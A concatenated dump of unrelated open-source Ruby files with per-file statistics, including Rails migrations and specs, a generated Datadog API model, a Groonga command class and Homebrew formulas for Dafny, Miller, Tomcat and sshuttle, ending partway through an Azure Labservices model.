s.homepage = 'http://aws.amazon.com/mobile/sdk'
s.license = 'Apache License, Version 2.0'
s.author = { 'Amazon Web Services' => 'amazonwebservices' }
s.platform = :ios, '8.0'
s.source = { :git => 'https://github.com/aws/aws-sdk-ios.git',
:tag => s.version}
s.requires_arc = true
s.dependency 'AWSCore', '2.9.4'
s.source_files = 'AWSTranscribe/*.{h,m}'
end
| 39.722222 | 157 | 0.613986 |
61516d7f5410bddd89808c520fda145d108347ba | 3,668 | class MergeCriteriaTables < ActiveRecord::Migration[6.0]
def change
# Create new criteria table
create_table :criteria do |t|
t.string 'name', null: false
t.string 'type', null: false
t.text 'description', null: false, default: ''
t.integer 'position', null: false
t.decimal 'max_mark', precision: 10, scale: 1, null: false
t.integer 'assigned_groups_count', default: 0, null: false
t.boolean 'ta_visible', default: true, null: false
t.boolean 'peer_visible', default: false, null: false
t.timestamps null: false
t.references :assessment, null: false, index: true, foreign_key: true
end
# Update/remove references to criteria in other tables
remove_column :assessments, :checkbox_criteria_count, :integer
remove_column :assessments, :flexible_criteria_count, :integer
remove_column :assessments, :rubric_criteria_count, :integer
remove_column :criteria_assignment_files_joins, :criterion_type, :string, null: false
remove_column :criterion_ta_associations, :criterion_type, :string
remove_column :test_groups, :criterion_type, :string
add_index :test_groups, :criterion_id
remove_foreign_key :levels, :rubric_criteria
rename_column :levels, :rubric_criterion_id, :criterion_id
add_foreign_key :levels, :criteria
remove_foreign_key :annotation_categories, :flexible_criteria
add_foreign_key :annotation_categories, :criteria, column: :flexible_criterion_id
remove_index :marks, column: [:markable_id, :result_id, :markable_type], name: "marks_u1", unique: true
remove_column :marks, :markable_type, :string
rename_column :marks, :markable_id, :criterion_id
add_foreign_key :marks, :criteria
# Remove old tables
drop_table :checkbox_criteria, cascade: :force do |t|
t.string "name", null: false
t.text "description"
t.integer "position"
t.decimal "max_mark", precision: 10, scale: 1, null: false
t.timestamps
t.integer "assigned_groups_count", default: 0
t.boolean "ta_visible", default: true, null: false
t.boolean "peer_visible", default: false, null: false
t.bigint "assessment_id", null: false
t.index ["assessment_id", "name"], name: "index_flexible_criteria_on_assessment_id_and_name", unique: true
t.index ["assessment_id"], name: "index_flexible_criteria_on_assessment_id"
end
drop_table :flexible_criteria, cascade: :force do |t|
t.string "name", null: false
t.text "description"
t.integer "position"
t.decimal "max_mark", precision: 10, scale: 1, null: false
t.timestamps
t.integer "assigned_groups_count", default: 0
t.boolean "ta_visible", default: true, null: false
t.boolean "peer_visible", default: false, null: false
t.bigint "assessment_id", null: false
t.index ["assessment_id", "name"], name: "index_checkbox_criteria_on_assessment_id_and_name", unique: true
t.index ["assessment_id"], name: "index_checkbox_criteria_on_assessment_id"
end
drop_table :rubric_criteria, cascade: :force do |t|
t.string "name", null: false
t.integer "position"
t.decimal "max_mark", precision: 10, scale: 1, null: false
t.timestamps
t.integer "assigned_groups_count", default: 0
t.boolean "ta_visible", default: true, null: false
t.boolean "peer_visible", default: false, null: false
t.bigint "assessment_id", null: false
t.index ["assessment_id", "name"], name: "index_rubric_criteria_on_assessment_id_and_name", unique: true
t.index ["assessment_id"], name: "rubric_criteria_index_1"
end
end
end
| 44.192771 | 112 | 0.708561 |
f8bfd5c9e26c8475aac69acfd9e323288bbb62e7 | 2,011 | # Extending QualityReport so that updating a single patient can deal with
# OID dictionaries
module QME
class QualityReport
field :aggregate_result, type: Integer
# Removes the cached results for the patient with the supplied id and
# recalculates as necessary
def self.update_patient_results(id)
# TODO: need to wait for any outstanding calculations to complete and then prevent
# any new ones from starting until we are done.
# drop any cached measure result calculations for the modified patient
QME::PatientCache.where('value.medical_record_id' => id).destroy()
# get a list of cached measure results for a single patient
sample_patient = QME::PatientCache.where({}).first
if sample_patient
cached_results = QME::PatientCache.where({'value.patient_id' => sample_patient['value']['patient_id']})
# for each cached result (a combination of measure_id, sub_id, effective_date and test_id)
cached_results.each do |measure|
# recalculate patient_cache value for modified patient
value = measure['value']
measure_model = QME::QualityMeasure.new(value['measure_id'], value['sub_id'])
oid_dictionary = OidHelper.generate_oid_dictionary(measure_model)
map = QME::MapReduce::Executor.new(value['measure_id'], value['sub_id'],
'effective_date' => value['effective_date'], 'test_id' => value['test_id'],
'oid_dictionary' => oid_dictionary)
map.map_record_into_measure_groups(id)
end
end
# remove the query totals so they will be recalculated using the new results for
# the modified patient
QME::QualityReport.where({}).each do |qr|
measure_model = QME::QualityMeasure.new(qr['measure_id'], qr['sub_id'])
oid_dictionary = OidHelper.generate_oid_dictionary(measure_model)
qr.calculate({"recalculate"=>true, "oid_dictionary" =>oid_dc},true)
end
end
end
end | 44.688889 | 112 | 0.685728 |
f8c6b9fa07d68efbd02d33e8913be3ebf3cd4883 | 960 | # encoding: utf-8
module Epuber
class Compiler
module FileTypes
require_relative 'generated_file'
class NavFile < GeneratedFile
# @return [Epuber::Version]
#
attr_reader :epub_version
# @param [Epuber::Version] epub_version
#
def initialize(epub_version)
super()
@epub_version = epub_version
properties << :navigation
self.destination_path = if epub_version >= 3
'nav.xhtml'
else
'nav.ncx'
end
self.path_type = :manifest
end
# @param [Compiler::CompilationContext] compilation_context
#
def process(compilation_context)
gen = NavGenerator.new(compilation_context)
write_generate(gen.generate_nav.to_s)
end
end
end
end
end
| 22.325581 | 67 | 0.517708 |
ff4788b52c26bf56f3b7e58abac1cd3acb0a79a1 | 515 | #!/usr/bin/env ruby
require "pathname"
$:.unshift File.expand_path("./lib")
require "basekit"
client = BaseKit::Client.new({
:api_base_url => "http://rest.basekit.almost",
:consumer_key => "",
:consumer_secret => "",
:access_token => "",
:access_secret => "",
})
client.post("/users", {
:brandRef => "1",
:username => "test",
:email => "[email protected]",
:firstName => "John",
:lastName => "Doe",
:languageCode => "en",
:password => "swordfish",
})
| 20.6 | 51 | 0.551456 |
b983e4d0b8056cb67f0f8af56480c4709f42649d | 8,342 | =begin
#Datadog API V1 Collection
#Collection of all Datadog Public endpoints.
The version of the OpenAPI document: 1.0
Contact: [email protected]
Generated by: https://openapi-generator.tech
Unless explicitly stated otherwise all files in this repository are licensed under the Apache-2.0 License.
This product includes software developed at Datadog (https://www.datadoghq.com/).
Copyright 2020-Present Datadog, Inc.
=end
require 'date'
require 'time'
module DatadogAPIClient::V1
# Axis controls for the widget.
class WidgetAxis
# whether the object has unparsed attributes
attr_accessor :_unparsed
# True includes zero.
attr_accessor :include_zero
# The label of the axis to display on the graph.
attr_accessor :label
# Specifies the maximum value to show on the y-axis. It takes a number, or auto for default behavior.
attr_accessor :max
# Specifies minimum value to show on the y-axis. It takes a number, or auto for default behavior.
attr_accessor :min
# Specifies the scale type. Possible values are `linear`, `log`, `sqrt`, `pow##` (e.g. `pow2`, `pow0.5` etc.).
attr_accessor :scale
# Attribute mapping from ruby-style variable name to JSON key.
def self.attribute_map
{
:'include_zero' => :'include_zero',
:'label' => :'label',
:'max' => :'max',
:'min' => :'min',
:'scale' => :'scale'
}
end
# Returns all the JSON keys this model knows about
def self.acceptable_attributes
attribute_map.values
end
# Attribute type mapping.
def self.openapi_types
{
:'include_zero' => :'Boolean',
:'label' => :'String',
:'max' => :'String',
:'min' => :'String',
:'scale' => :'String'
}
end
# List of attributes with nullable: true
def self.openapi_nullable
Set.new([
])
end
# Initializes the object
# @param [Hash] attributes Model attributes in the form of hash
def initialize(attributes = {})
if (!attributes.is_a?(Hash))
fail ArgumentError, "The input argument (attributes) must be a hash in `DatadogAPIClient::V1::WidgetAxis` initialize method"
end
# check to see if the attribute exists and convert string to symbol for hash key
attributes = attributes.each_with_object({}) { |(k, v), h|
if (!self.class.attribute_map.key?(k.to_sym))
fail ArgumentError, "`#{k}` is not a valid attribute in `DatadogAPIClient::V1::WidgetAxis`. Please check the name to make sure it's valid. List of attributes: " + self.class.attribute_map.keys.inspect
end
h[k.to_sym] = v
}
if attributes.key?(:'include_zero')
self.include_zero = attributes[:'include_zero']
end
if attributes.key?(:'label')
self.label = attributes[:'label']
end
if attributes.key?(:'max')
self.max = attributes[:'max']
else
self.max = 'auto'
end
if attributes.key?(:'min')
self.min = attributes[:'min']
else
self.min = 'auto'
end
if attributes.key?(:'scale')
self.scale = attributes[:'scale']
else
self.scale = 'linear'
end
end
# Show invalid properties with the reasons. Usually used together with valid?
# @return Array for valid properties with the reasons
def list_invalid_properties
invalid_properties = Array.new
invalid_properties
end
# Check to see if the all the properties in the model are valid
# @return true if the model is valid
def valid?
true
end
# Checks equality by comparing each attribute.
# @param [Object] Object to be compared
def ==(o)
return true if self.equal?(o)
self.class == o.class &&
include_zero == o.include_zero &&
label == o.label &&
max == o.max &&
min == o.min &&
scale == o.scale
end
# @see the `==` method
# @param [Object] Object to be compared
def eql?(o)
self == o
end
# Calculates hash code according to all attributes.
# @return [Integer] Hash code
def hash
[include_zero, label, max, min, scale].hash
end
# Builds the object from hash
# @param [Hash] attributes Model attributes in the form of hash
# @return [Object] Returns the model itself
def self.build_from_hash(attributes)
new.build_from_hash(attributes)
end
# Builds the object from hash
# @param [Hash] attributes Model attributes in the form of hash
# @return [Object] Returns the model itself
def build_from_hash(attributes)
return nil unless attributes.is_a?(Hash)
self.class.openapi_types.each_pair do |key, type|
if attributes[self.class.attribute_map[key]].nil? && self.class.openapi_nullable.include?(key)
self.send("#{key}=", nil)
elsif type =~ /\AArray<(.*)>/i
# check to ensure the input is an array given that the attribute
# is documented as an array but the input is not
if attributes[self.class.attribute_map[key]].is_a?(Array)
self.send("#{key}=", attributes[self.class.attribute_map[key]].map { |v| _deserialize($1, v) })
end
elsif !attributes[self.class.attribute_map[key]].nil?
self.send("#{key}=", _deserialize(type, attributes[self.class.attribute_map[key]]))
end
end
self
end
# Deserializes the data based on type
# @param string type Data type
# @param string value Value to be deserialized
# @return [Object] Deserialized data
def _deserialize(type, value)
case type.to_sym
when :Time
Time.parse(value)
when :Date
Date.parse(value)
when :String
value.to_s
when :Integer
value.to_i
when :Float
value.to_f
when :Boolean
if value.to_s =~ /\A(true|t|yes|y|1)\z/i
true
else
false
end
when :Object
# generic object (usually a Hash), return directly
value
when :Array
# generic array, return directly
value
when /\AArray<(?<inner_type>.+)>\z/
inner_type = Regexp.last_match[:inner_type]
value.map { |v| _deserialize(inner_type, v) }
when /\AHash<(?<k_type>.+?), (?<v_type>.+)>\z/
k_type = Regexp.last_match[:k_type]
v_type = Regexp.last_match[:v_type]
{}.tap do |hash|
value.each do |k, v|
hash[_deserialize(k_type, k)] = _deserialize(v_type, v)
end
end
else # model
# models (e.g. Pet) or oneOf
klass = DatadogAPIClient::V1.const_get(type)
res = klass.respond_to?(:openapi_one_of) ? klass.build(value) : klass.build_from_hash(value)
if res.instance_of? DatadogAPIClient::V1::UnparsedObject
self._unparsed = true
end
res
end
end
# Returns the string representation of the object
# @return [String] String presentation of the object
def to_s
to_hash.to_s
end
# to_body is an alias to to_hash (backward compatibility)
# @return [Hash] Returns the object in the form of hash
def to_body
to_hash
end
# Returns the object in the form of hash
# @return [Hash] Returns the object in the form of hash
def to_hash
hash = {}
self.class.attribute_map.each_pair do |attr, param|
value = self.send(attr)
if value.nil?
is_nullable = self.class.openapi_nullable.include?(attr)
next if !is_nullable || (is_nullable && !instance_variable_defined?(:"@#{attr}"))
end
hash[param] = _to_hash(value)
end
hash
end
# Outputs non-array value in the form of hash
# For object, use to_hash. Otherwise, just return the value
# @param [Object] value Any valid value
# @return [Hash] Returns the value in the form of hash
def _to_hash(value)
if value.is_a?(Array)
value.compact.map { |v| _to_hash(v) }
elsif value.is_a?(Hash)
{}.tap do |hash|
value.each { |k, v| hash[k] = _to_hash(v) }
end
elsif value.respond_to? :to_hash
value.to_hash
else
value
end
end
end
end
| 29.792857 | 210 | 0.61508 |
39a51aeab4c07820f7675fdd1b0fd19071b4be6e | 1,307 | # This file is auto-generated from the current state of the database. Instead
# of editing this file, please use the migrations feature of Active Record to
# incrementally modify your database, and then regenerate this schema definition.
#
# This file is the source Rails uses to define your schema when running `rails
# db:schema:load`. When creating a new database, `rails db:schema:load` tends to
# be faster and is potentially less error prone than running all of your
# migrations from scratch. Old migrations may fail to apply correctly if those
# migrations use external dependencies or application code.
#
# It's strongly recommended that you check this file into your version control system.
ActiveRecord::Schema.define(version: 2020_01_28_224837) do
create_table "clients", force: :cascade do |t|
t.string "name"
t.string "role"
t.datetime "created_at", precision: 6, null: false
t.datetime "updated_at", precision: 6, null: false
end
create_table "weeks", force: :cascade do |t|
t.integer "client"
t.text "monday"
t.text "tuesday"
t.text "wednesday"
t.text "thursday"
t.text "friday"
t.text "saturday"
t.text "subday"
t.datetime "created_at", precision: 6, null: false
t.datetime "updated_at", precision: 6, null: false
end
end
| 36.305556 | 86 | 0.729916 |
bb0104012ed56c234726c4eadc81d409e73d58ae | 452 | # frozen_string_literal: true
require_relative '../../test_helper'
require_relative '../../support/utils/api_controller_test_utils'
describe API::V1::CitiesController do
include API::ControllerTestUtils
before { sign_in users(:researcher) }
it { api_get_works_for :index }
it { has_no_route_for :get, :show }
it { has_no_route_for :post, :create }
it { has_no_route_for :patch, :update }
it { has_no_route_for :delete, :destroy }
end
| 26.588235 | 64 | 0.736726 |
288123f4e170b4ace437bce745097e3b1b6ece67 | 2,124 | require 'rails_helper'
RSpec.describe PlacesController, :type => :controller do
def valid_attributes
place = FactoryGirl.build(:place)
{name: place.name}
end
describe "GET 'index'" do
before(:each) do
get :index
end
it "returns http success" do
expect(response).to be_success
end
end
describe "GET 'show'" do
render_views
before(:each) do
@place = FactoryGirl.create(:place)
get :show, {:id => @place.id}
end
it "returns http success" do
expect(response).to be_success
end
it "contains place name" do
expect(response.body).to include(@place.name)
end
end
# describe "GET 'new'" do
# before(:each) do
# get :new
# end
# it "returns http success" do
# expect(response).to be_success
# end
# it "assign a new place" do
# expect(assigns(:place)).to be_a_new(Place)
# end
# end
# describe "POST create" do
# describe "with valid params" do
# it "creates a new Place" do
# expect {
# post :create, :place => valid_attributes
# }.to change(Place, :count).by(1)
# end
# it "redirects to place page" do
# post :create, :place => valid_attributes
# expect(response).to redirect_to(place_path(Place.last))
# end
# end
# end
# describe "GET 'edit'" do
# before(:each) do
# @place = FactoryGirl.create(:place)
# get :edit, {:id => @place.id}
# end
# it "returns http success" do
# expect(response).to be_success
# end
# end
# describe "PUT update" do
# before(:each) do
# @place = FactoryGirl.create(:place)
# end
# describe "with valid params" do
# before(:each) do
# put :update, :id => @place.id,:place => {:name => 'Nuevo Alohamiento'}
# end
# it "changes place attributes" do
# @place.reload
# expect(@place.name).to eq("Nuevo Alohamiento")
# end
# it "redirects to updated place page" do
# expect(response).to redirect_to(@place)
# end
# end
# end
end
| 22.83871 | 80 | 0.577213 |
4a79dc3b8e3ef2434c8a18e6aa3757cba4d62312 | 2,406 | class Dafny < Formula
desc "Verification-aware programming language"
homepage "https://github.com/dafny-lang/dafny/blob/master/README.md"
url "https://github.com/dafny-lang/dafny/archive/v3.4.1.tar.gz"
sha256 "75c86d22ed9b9b7b88b078e2f27cca6b408070dd95e865e3e57f2dc3c3cd0bbe"
license "MIT"
livecheck do
url :stable
strategy :github_latest
end
bottle do
sha256 cellar: :any_skip_relocation, arm64_big_sur: "cafe436fc36a25d764dbd6df575e439946b0f053cb345dfadd24f985f267a249"
sha256 cellar: :any_skip_relocation, big_sur: "a3d5478bedb09f2fd726b742f22487a4c871b4332b605a5e01798c5c09cc4c67"
sha256 cellar: :any_skip_relocation, catalina: "b0fa4440abcd948f144364214b46696ef42588ae7b660c94504d42959fa53f77"
sha256 cellar: :any_skip_relocation, x86_64_linux: "1cb42e002a7c4e005e17b60c5676aa7780acad2b598609b7a51249e5226cc205"
end
depends_on "gradle" => :build
depends_on "[email protected]" => :build # for z3
depends_on "dotnet"
depends_on "openjdk@11"
# Use the following along with the z3 build below, as long as dafny
# cannot build with latest z3 (https://github.com/dafny-lang/dafny/issues/810)
resource "z3" do
url "https://github.com/Z3Prover/z3/archive/Z3-4.8.5.tar.gz"
sha256 "4e8e232887ddfa643adb6a30dcd3743cb2fa6591735fbd302b49f7028cdc0363"
end
def install
system "make", "exe"
libexec.install Dir["Binaries/*", "Scripts/quicktest.sh"]
dst_z3_bin = libexec/"z3/bin"
dst_z3_bin.mkpath
resource("z3").stage do
ENV["PYTHON"] = which("python3")
system "./configure"
system "make", "-C", "build"
mv("build/z3", dst_z3_bin/"z3")
end
(bin/"dafny").write <<~EOS
#!/bin/bash
dotnet #{libexec}/Dafny.dll "$@"
EOS
end
test do
(testpath/"test.dfy").write <<~EOS
method Main() {
var i: nat;
assert i as int >= -1;
print "hello, Dafny\\n";
}
EOS
assert_equal "\nDafny program verifier finished with 1 verified, 0 errors\n",
shell_output("#{bin}/dafny /compile:0 #{testpath}/test.dfy")
assert_equal "\nDafny program verifier finished with 1 verified, 0 errors\nRunning...\n\nhello, Dafny\n",
shell_output("#{bin}/dafny /compile:3 #{testpath}/test.dfy")
assert_equal "Z3 version 4.8.5 - 64 bit\n",
shell_output("#{libexec}/z3/bin/z3 -version")
end
end
| 34.869565 | 122 | 0.691189 |
62b9d201c18e13b8b4e615db842152fb980ef947 | 128 | class AllowImagesPostIdToBeNull < ActiveRecord::Migration
def change
change_column_null :images, :post_id, true
end
end
| 21.333333 | 57 | 0.789063 |
1a61341f52327f1ba14ea5905b3a7e200548896f | 1,735 | class Miller < Formula
desc "Like sed, awk, cut, join & sort for name-indexed data such as CSV"
homepage "https://github.com/johnkerl/miller"
url "https://github.com/johnkerl/miller/releases/download/v5.9.1/mlr-5.9.1.tar.gz"
sha256 "fb531efe5759b99935ce420c8ad763099cf11c2db8d32e8524753f4271454b57"
license "BSD-2-Clause"
head "https://github.com/johnkerl/miller.git"
bottle do
cellar :any_skip_relocation
sha256 "775f496bb2d1aaee32a3bb103eb85cfb7b8c4937972b36f7c3960f4a826ca05d" => :big_sur
sha256 "f723f639b78b03e09657ec505aaac48b7971fbe924b4269f860f1bc97f7db9cc" => :catalina
sha256 "36c0835f067998aa8458762915d3cfaf8304170fe47433c43f7001a302110e08" => :mojave
sha256 "e034b65d138c356931f0c29d5808d6d8cbc3468bfb7a0007edd37637f0dd265b" => :high_sierra
sha256 "a3c9b74132a763ed2b167757853a8db00df69da59204176e496d56ce586b7412" => :x86_64_linux
end
depends_on "autoconf" => :build
depends_on "automake" => :build
depends_on "libtool" => :build
uses_from_macos "flex" => :build
def install
# Profiling build fails with Xcode 11, remove it
inreplace "c/Makefile.am", /noinst_PROGRAMS=\s*mlrg/, ""
system "autoreconf", "-fvi"
system "./configure", "--prefix=#{prefix}", "--disable-silent-rules",
"--disable-dependency-tracking"
system "make"
# Time zone related tests fail. Reported upstream https://github.com/johnkerl/miller/issues/237
system "make", "check" if !OS.mac? && ENV["CI"]
system "make", "install"
end
test do
(testpath/"test.csv").write <<~EOS
a,b,c
1,2,3
4,5,6
EOS
output = pipe_output("#{bin}/mlr --csvlite cut -f a test.csv")
assert_match /a\n1\n4\n/, output
end
end
| 36.914894 | 99 | 0.712392 |
33db91fee94e394a564647ee2677f9b61bd5f087 | 1,456 | {
matrix_id: '2094',
name: 'n3c5-b6',
group: 'JGD_Homology',
description: 'Simplicial complexes from Homology from Volkmar Welker.',
author: 'V. Welker',
editor: 'J.-G. Dumas',
date: '2008',
kind: 'combinatorial problem',
problem_2D_or_3D: '0',
num_rows: '120',
num_cols: '210',
nonzeros: '840',
num_explicit_zeros: '0',
num_strongly_connected_components: '1',
num_dmperm_blocks: '1',
structural_full_rank: 'true',
structural_rank: '120',
pattern_symmetry: '0.000',
numeric_symmetry: '0.000',
rb_type: 'integer',
structure: 'rectangular',
cholesky_candidate: 'no',
positive_definite: 'no',
notes: 'Simplicial complexes from Homology from Volkmar Welker.
From Jean-Guillaume Dumas\' Sparse Integer Matrix Collection,
http://ljk.imag.fr/membres/Jean-Guillaume.Dumas/simc.html
http://www.mathematik.uni-marburg.de/~welker/
Filename in JGD collection: Homology/n3c5.b6.120x210.sms
',
norm: '3.162278e+00',
min_singular_value: '2.457934e-17',
condition_number: '128655942511552272',
svd_rank: '84',
sprank_minus_rank: '36',
null_space_dimension: '36',
full_numerical_rank: 'no',
svd_gap: '1242566669259700.250000',
image_files: 'n3c5-b6.png,n3c5-b6_svd.png,n3c5-b6_graph.gif,',
}
| 33.860465 | 75 | 0.611264 |
26dfe68cd010cf76f572ae9ad30f0bae93fd1357 | 1,306 | module Groonga
class Command
@@classes = {}
class << self
def register_class(name, klass)
@@classes[name] = klass
end
def find_class(name)
@@classes[name]
end
end
private
def context
@context ||= Context.instance
end
def writer
@writer ||= context.writer
end
def query_logger
@query_logger ||= context.query_logger
end
def cache_key(input)
nil
end
def cache_output(key, options={})
if key.nil?
yield
else
cache = Cache.current
cached_value = cache.fetch(key)
if cached_value
context.output = cached_value
query_logger.log(:cache, ":", "cache(#{cached_value.bytesize})")
else
yield
cache.update(key, context.output) if options[:update]
end
end
end
def run_internal(input)
begin
options = {
:update => (input["cache"] != "no"),
}
cache_output(cache_key(input), options) do
run_body(input)
end
rescue GroongaError => groonga_error
context.set_groonga_error(groonga_error)
nil
rescue => error
context.record_error(:command_error, error)
nil
end
end
end
end
| 20.092308 | 74 | 0.557427 |
f8a851a7b70b5cb3a1f6b3e0bc264c98ff66cc8e | 119 | class AddTimeToLessons < ActiveRecord::Migration[5.1]
def change
add_column :lessons, :time, :datetime
end
end
| 19.833333 | 53 | 0.739496 |
f8306555a2aeae37110959ff4c5b5a40249f0fc8 | 356 | module Findable
extend ActiveSupport::Concern
module ClassMethods
def find_by_id(id)
query = ::IdQuery.new id
search_options = {
index: index_names,
body: query.generate_search_body,
}
results = ES.client.search search_options
hits = results['hits']
hits.deep_symbolize_keys
end
end
end
| 19.777778 | 47 | 0.648876 |
9116d711b36c2b2b4adc1bbe90b61302d3c516ad | 1,426 | class Tomcat < Formula
homepage "https://tomcat.apache.org/"
url "https://www.apache.org/dyn/closer.cgi?path=tomcat/tomcat-8/v8.0.23/bin/apache-tomcat-8.0.23.tar.gz"
mirror "https://archive.apache.org/dist/tomcat/tomcat-8/v8.0.23/bin/apache-tomcat-8.0.23.tar.gz"
sha256 "c98b19a1edaaef2859991f304d0ec8f29c5ccacc6d63a0bc8bf7078d63191a38"
bottle do
cellar :any
sha256 "5c43653281e5e7099230ebb76616583935538140b7802ec5d0fdbb719ccdc5e0" => :yosemite
sha256 "caa72406f8f0f60d56dd656aa31e6170194df58d97c7f4661c93624771106c6b" => :mavericks
sha256 "0fd6ba9c446dc1cf03c7dc1d537f61b879f8f1d194bf998cb1a0353a09e21831" => :mountain_lion
end
option "with-fulldocs", "Install full documentation locally"
resource "fulldocs" do
url "https://www.apache.org/dyn/closer.cgi?path=/tomcat/tomcat-8/v8.0.23/bin/apache-tomcat-8.0.23-fulldocs.tar.gz"
mirror "https://archive.apache.org/dist/tomcat/tomcat-8/v8.0.23/bin/apache-tomcat-8.0.23-fulldocs.tar.gz"
version "8.0.23"
sha256 "bd0c85d48ccd6f0b7838e55215a7e553a8b9b58fd1a880560a7414940413f6d3"
end
def install
# Remove Windows scripts
rm_rf Dir["bin/*.bat"]
# Install files
prefix.install %w[ NOTICE LICENSE RELEASE-NOTES RUNNING.txt ]
libexec.install Dir["*"]
bin.install_symlink "#{libexec}/bin/catalina.sh" => "catalina"
(share/"fulldocs").install resource("fulldocs") if build.with? "fulldocs"
end
end
| 40.742857 | 118 | 0.753156 |
5d9386b257b6546efc087dc9347167bfa3b7a289 | 1,051 | class Sshuttle < Formula
include Language::Python::Virtualenv
desc "Proxy server that works as a poor man's VPN"
homepage "https://github.com/sshuttle/sshuttle"
url "https://github.com/sshuttle/sshuttle.git",
tag: "v1.0.4",
revision: "abb48f199656f776be0f05601ff5746f36df3370"
license "LGPL-2.1-or-later"
head "https://github.com/sshuttle/sshuttle.git"
bottle do
cellar :any_skip_relocation
sha256 "a06b10df1dfc84196e2e02b32439f1e2558ef8355192ef5afc3cbfd951eb3607" => :catalina
sha256 "7e36de2ff8ac37e23c9d54ddd393881bd7a312163a98311b23dc70d0b9bb1f7d" => :mojave
sha256 "323c8b112631584ca559e5a588d7822b61af3d3e8eda30a3b0699710d627af0a" => :high_sierra
sha256 "2b6d6f1376a7e9f217bb5453e817001e79774f416acc968632039db9b9e263e8" => :x86_64_linux
end
depends_on "[email protected]"
def install
# Building the docs requires installing
# markdown & BeautifulSoup Python modules
# so we don't.
virtualenv_install_with_resources
end
test do
system bin/"sshuttle", "-h"
end
end
| 31.848485 | 94 | 0.758325 |
e86d3ea198cfef6e7516b5558093fe7432ae568e | 1,129 | local_cache [@posts.map(&:id), params[:verbose]], expires: 1.hour do
atom_feed :root_url => url_for(:controller => :post, :action => :index, :tags => params[:tags], :only_path => false) do |feed|
feed.title CONFIG['app_name']
feed.updated @posts[0].created_at if @posts.length > 0
@posts.each do |post|
post_url = url_for :controller => :post, :action => :show, :id => post.id, :only_path => false
post_preview_url = URI.join root_url(:only_path => false), post.preview_url
feed.entry post, :url => post_url, :updated => post.updated_at do |entry|
entry.link :href => post_preview_url, :rel => 'enclosure'
entry.title '%s [%s]' % [post.cached_tags, "#{post.width}x#{post.height}"]
entry.summary post.cached_tags
entry.content render(:partial => 'post_atom', :formats => :html, :locals => { :post => post, :post_url => post_url }), :type => 'html'
entry.author do |author|
author.name post.author
author.uri url_for(:controller => :user, :action => :show, :id => post.user_id, :only_path => false)
end
end
end
end
end
| 53.761905 | 142 | 0.621789 |
6a969c9e751d2854e5b714bf678423e99e474f85 | 191 | RSpec.describe JbaezViewTool do
it "has a version number" do
expect(JbaezViewTool::VERSION).not_to be nil
end
it "does something useful" do
expect(false).to eq(true)
end
end
| 19.1 | 48 | 0.717277 |
abc086afb2b9de4fda74d7567f043672bb314a4b | 500 | require 'spec_helper'
describe 'swift::proxy::healthcheck' do
let :facts do
{}
end
let :pre_condition do
'class { "concat::setup": }
concat { "/etc/swift/proxy-server.conf": }'
end
let :fragment_file do
"/var/lib/puppet/concat/_etc_swift_proxy-server.conf/fragments/25_swift_healthcheck"
end
it { should contain_file(fragment_file).with_content(/[filter:healthcheck]/) }
it { should contain_file(fragment_file).with_content(/use = egg:swift#healthcheck/) }
end
| 22.727273 | 88 | 0.708 |
e2da7bd23a333a571265f67f84fa4b2d761811fb | 4,030 | describe PaynetApi::ReportRequest do
let(:test_id_from_paynet) { "59206906" }
let(:request) { PaynetApi::ReportRequest.new(paynet_id: test_id_from_paynet, payment_comprehensive: "1") }
let(:request_with_options) { PaynetApi::ReportRequest.new(
paynet_id: test_id_from_paynet,
payment_comprehensive: "1",
business_background: "1",
public_filings: "1",
ucc_filings: "1",
legal_name: "1",
transpo_score: "2",
office_score: "1",
constr_score: "1",
master_score: "2",
expanded_vars: "1"
) }
let(:request_without_paynet_id) { PaynetApi::ReportRequest.new }
let(:request_without_any_reports_chosen) { PaynetApi::ReportRequest.new(paynet_id: test_id_from_paynet) }
subject { request }
describe ".FORMAT" do
it "defaults to nil" do
expect(subject.class::FORMAT).to eq(nil)
end
end
describe "#initialize" do
context "with required params passed in" do
its (:paynet_id){ should eq(test_id_from_paynet) }
# Ramdonly picking one of the reports to pass in
# payment comprehensive isn't required, but passing in ONE report IS.
its (:payment_comprehensive){ should eq("1") }
context "with optional arguments" do
subject { request_with_options }
its (:payment_comprehensive){ should eq("1") }
its (:business_background){ should eq("1") }
its (:public_filings){ should eq("1") }
its (:ucc_filings){ should eq("1") }
its (:legal_name){ should eq("1") }
its (:transpo_score){ should eq("2") }
its (:office_score){ should eq("1") }
its (:constr_score){ should eq("1") }
its (:master_score){ should eq("2") }
its (:expanded_vars){ should eq("1") }
end
context "without optional arguments" do
its (:business_background){ should eq(nil) }
its (:public_filings){ should eq(nil) }
its (:ucc_filings){ should eq(nil) }
its (:legal_name){ should eq(nil) }
its (:transpo_score){ should eq(nil) }
its (:office_score){ should eq(nil) }
its (:constr_score){ should eq(nil) }
its (:master_score){ should eq(nil) }
its (:expanded_vars){ should eq(nil) }
end
end
context "without a paynet_id passed in" do
it "raises an argument error" do
expect{ request_without_paynet_id }.to raise_error(ArgumentError, "missing keyword: paynet_id")
end
end
context "without any report chosen" do
it "raises an argument error" do
expect{ request_without_any_reports_chosen }.to raise_error(ArgumentError, "You must pass in a value for at least one of the following params: payment_comprehensive, business_background, public_filings, ucc_filings, legal_name, transpo_score, office_score, constr_score, master_score, or expanded_vars")
end
end
end
describe "#query" do
let(:query) { URI.encode("password=#{ENV["BASIC_AUTH_PASSWORD"]}&payment_comprehensive=1&paynet_id=#{subject.paynet_id}&user=#{ENV["BASIC_AUTH_USER"]}&version=0320") }
context "with required arguments" do
it "creates the correct encoded path with params for Paynet" do
expect(subject.query).to eq(query)
end
end
context "with optional arguments" do
let(:query_with_options) { URI.encode("business_background=#{subject.business_background}&constr_score=#{subject.constr_score}&expanded_vars=#{subject.expanded_vars}&legal_name=#{subject.legal_name}&master_score=#{subject.master_score}&office_score=#{subject.office_score}&password=#{ENV["BASIC_AUTH_PASSWORD"]}&payment_comprehensive=#{subject.payment_comprehensive}&paynet_id=#{subject.paynet_id}&public_filings=#{subject.public_filings}&transpo_score=#{subject.transpo_score}&ucc_filings=#{subject.ucc_filings}&user=#{ENV["BASIC_AUTH_USER"]}&version=0320") }
subject { request_with_options }
it "creates the correct encoded query with params for Paynet" do
expect(subject.query).to eq(query_with_options)
end
end
end
end
| 41.979167 | 566 | 0.685112 |
33c85a5e96480d1656144d58d702ec127d19a8cd | 7,219 | # Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::Labservices::Mgmt::V2018_10_15
module Models
#
# Represents an image from the Azure Marketplace
#
class GalleryImage < Resource
include MsRestAzure
# @return [String] The author of the gallery image.
attr_accessor :author
